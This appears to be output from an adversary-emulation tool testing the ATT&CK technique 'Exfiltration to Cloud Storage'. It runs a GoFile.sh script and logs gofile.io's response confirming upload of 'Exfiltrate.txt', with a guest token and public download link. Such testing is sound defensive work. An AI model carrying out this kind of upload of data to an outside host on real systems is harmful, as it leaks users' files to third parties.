[+] Tactic ID   : T1048.003 -3
[+] Technique   : Exfiltration Over Alternative Protocol: Exfiltration to Cloud Storage (GoFile)
[+] Command     :
bash Dependencies/GoFile.sh
[+] Success
----- OUTPUT START -----
Response:
{
  "data": {
    "createTime": 1754545597,
    "downloadPage": "https://gofile.io/d/rUtGH0",
    "guestToken": "hhrniZV8KjCOv6nexR4cci0iWZcS2pEe",
    "id": "bb43339e-82f0-4db7-9187-f5679e02a8a0",
    "md5": "556ec229f92612df412a6a998da60c1d",
    "mimetype": "text/plain; charset=utf-8",
    "modTime": 1754545597,
    "name": "Exfiltrate.txt",
    "parentFolder": "e940ad05-9f98-4156-a3fb-8cdf528cae64",
    "parentFolderCode": "rUtGH0",
    "servers": [
      "cold-na-phx-3"
    ],
    "size": 46,
    "type": "file"
  },
  "status": "ok"
}
[+] Download link: https://gofile.io/d/rUtGH0
----- OUTPUT END -----
